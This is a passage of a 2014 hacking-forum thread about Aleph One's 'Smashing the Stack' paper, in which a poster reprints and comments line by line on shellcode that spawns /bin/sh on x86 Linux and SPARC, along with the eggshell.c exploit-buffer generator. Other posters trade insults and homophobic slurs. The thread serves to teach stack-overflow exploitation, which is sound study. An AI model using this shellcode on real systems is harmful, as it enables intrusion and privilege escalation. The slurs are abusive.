Author Topic: Smashing The Stack/Shellcode  (Read 1544 times)

0 Members and 1 Guest are viewing this topic.

Offline 10 gun salute

  • Adherent
  • *
  • !
  • Posts: 35
    • View Profile
Re: Smashing The Stack/Shellcode
« Reply #15 on: October 29, 2014, 09:51:29 pm »

Yeah yeah, we all know what ports and 0days are.

Then again, you don't speak for everyone who may be reading this thread. Some may not know, and that's why I posted the info.

As for your other "questions", go fuck yourself. I don't answer the questions of known PI-rats and &Totse traitors like you. The only way I'd help you is to throw you an anvil if you were drowning. Keep fagging my thread up and I'll just put you on ignore.

oh my god spectral, just kick the ladder out next time you're on a roof

Offline Lanny

  • Zealot
  • ****
  • Posts: 1,123
    • View Profile
Re: Smashing The Stack/Shellcode
« Reply #16 on: October 29, 2014, 10:56:55 pm »
lol, nice admission that you have no idea what that code actually does fagtral

Offline -SpectraL

  • Commandant
  • ****
  • Posts: 1,605
  • Sinking kidiots since 1989
    • View Profile
Re: Smashing The Stack/Shellcode
« Reply #17 on: October 29, 2014, 10:59:47 pm »
lol, nice admission that you have no idea what that code actually does fagtral

I know what it does, you dumb kid. I used to write my own, and they worked extremely well.

Offline Lanny

  • Zealot
  • ****
  • Posts: 1,123
    • View Profile
Re: Smashing The Stack/Shellcode
« Reply #18 on: October 29, 2014, 11:00:51 pm »
Then you wouldn't pussy out in trying to explain it, like how you felt you needed to explain what a port is.

Offline aldra

  • Arch Disciple
  • ***
  • Posts: 623
  • albrecht drais
    • View Profile
Re: Smashing The Stack/Shellcode
« Reply #19 on: October 29, 2014, 11:20:07 pm »

I know what it does, you dumb kid. I used to write my own, and they worked extremely well.

copypasting articles from phrack and not explaining them really doesn't help anyone, especially since the two things you posted aren't even directly related

I'm commenting the overflow code now

Offline aldra

  • Arch Disciple
  • ***
  • Posts: 623
  • albrecht drais
    • View Profile
Re: Smashing The Stack/Shellcode
« Reply #20 on: October 30, 2014, 05:28:14 am »
Code: [Select]
// shellcode.h - header file

#if defined(__i386__) && defined(__linux__)
#define NOP_SIZE 1 char nop[] = "\x90";
char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}


#elif defined(__sparc__) && defined(__sun__) && defined(__svr4__)
#define NOP_SIZE 4 char nop[]="\xac\x15\xa1\x6e";

char shellcode[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
"\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";

unsigned long get_sp(void)
{
__asm__("or %sp, %sp, %i0");
}

#elif defined(__sparc__) && defined(__sun__)
#define NOP_SIZE        4 char nop[]="\xac\x15\xa1\x6e";

char shellcode[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\xaa\x10\x3f\xff"
"\x91\xd5\x60\x01\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd5\x60\x01";

unsigned long get_sp(void)
{
__asm__("or %sp, %sp, %i0");
}

#endif

I won't inline-comment this because it's fairly straightforward - because the payload is written in assembler, different payloads are required for different processor types (x86, and two SPARC variants are defined here). the program auto-detects the processor based on system variables and chooses the correct payload automatically. the NOP is the no-operation code, an assembler instruction to do nothing. in this circumstance I think it's used to overwrite anything that was previously in the memory location without interfering with operation of the shellcode (see http://en.wikipedia.org/wiki/NOP_slide).

Code: [Select]
// eggshell.c - code file
/ * * eggshell v1.0 * * Aleph One / aleph1@underground.org */

#include <stdlib.h>
#include <stdio.h>
#include "shellcode.h"
#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512
#define DEFAULT_EGG_SIZE               2048

void usage(void);

void main(int argc, char *argv[])
{
char *ptr, *bof, *egg; long *addr_ptr, addr; // declare a bunch of variables
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; // command-line parameters default to the #define'd defaults above unless overriden
int i, n, m, c, align=0, eggsize=DEFAULT_EGG_SIZE; // as above

while ((c = getopt(argc, argv, "a:b:e:o:")) != EOF) // not important - this part reads the command line parameters
switch (c)
{
case 'a': align = atoi(optarg);
break;
case 'b': bsize = atoi(optarg);
break;
case 'e': eggsize = atoi(optarg);
break;
case 'o': offset = atoi(optarg);
break; case '?': usage();
exit(0);
} // end command line reader
if (strlen(shellcode) > eggsize) // validate whether shellcode can fit in 'egg'
{
printf("Shellcode is larger the the egg.\n");
exit(0);
}

if (!(bof = malloc(bsize))) // allocate a buffer with a fixed length to be exploited
{
printf("Can't allocate memory.\n");
exit(0);
}

if (!(egg = malloc(eggsize)) // allocate a block of memory to hold the 'egg'
{
printf("Can't allocate memory.\n");
exit(0);
}

addr = get_sp() - offset; // I think we're missing some code here, because get_sp() is supposed to link to an asm function to get the current stack pointer

printf("[ Buffer size:\t%d\t\tEgg size:\t%d\tAligment:\t%d\t]\n", bsize, eggsize, align);
printf("[ Address:\t0x%x\tOffset:\t\t%d\t\t\t\t]\n", addr, offset);
addr_ptr = (long *) bof; // create a pointer (in addr_ptr) to the exploitable buffer

for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; // move the pointer to the very end of the buffer

ptr = egg; // put a pointer at the beginning of the egg's memory
for (i = 0; i <= eggsize - strlen(shellcode) - NOP_SIZE; i += NOP_SIZE) // calculate length of data in the egg (shellcode + 1 NOP) to see how much needs to be filled up with NOPs

for (n = 0; n < NOP_SIZE; n++)
{
m = (n + align) % NOP_SIZE; *(ptr++) = nop[m]; // fucking math. I think this is to fill the egg up with NOPs, convoluted calculation because that interrupt code is more than 1 byte
}

for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; // ptr is still at the beginning of egg, this loop reads all bytes from shellcode and pushes them to egg, one by one

bof[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; // add null terminator (ie. end of string code) to the end of the exploitable buffer and the end of the egg
memcpy(egg,"EGG=",4); // set egg as environment variable
putenv(egg);
memcpy(bof,"BOF=",4); // set exploitable buffer as environment variable
putenv(bof);
system("/bin/sh");
}

void usage(void)
{
(void)fprintf(stderr, "usage: eggshell [-a <alignment>] [-b <buffersize>] [-e <eggsize>] [-o <offset>]\n");
}


ok this is incomplete. if we look at http://insecure.org/stf/smashstack.html, the exploit is meant to be run alongside vulnerable.c - this one creates the exploit code, and you are meant to pipe the output to vulnerable.c which is the program that actually has the vulnerable buffer as it's input parameter.





sorry if I fucked anything up, I'll go back and recheck later - been doing this off and on at work today

Offline Lanny

  • Zealot
  • ****
  • Posts: 1,123
    • View Profile
Re: Smashing The Stack/Shellcode
« Reply #21 on: October 31, 2014, 01:43:11 am »
Ahh, I see now. I thought execution was going to hit that malloc'd buffer which doesn't make sense since you can just execute arbitrary code if you're there anyway, no need to try and create an overflow if you control the program counter. Thanks for going through the process of commenting it.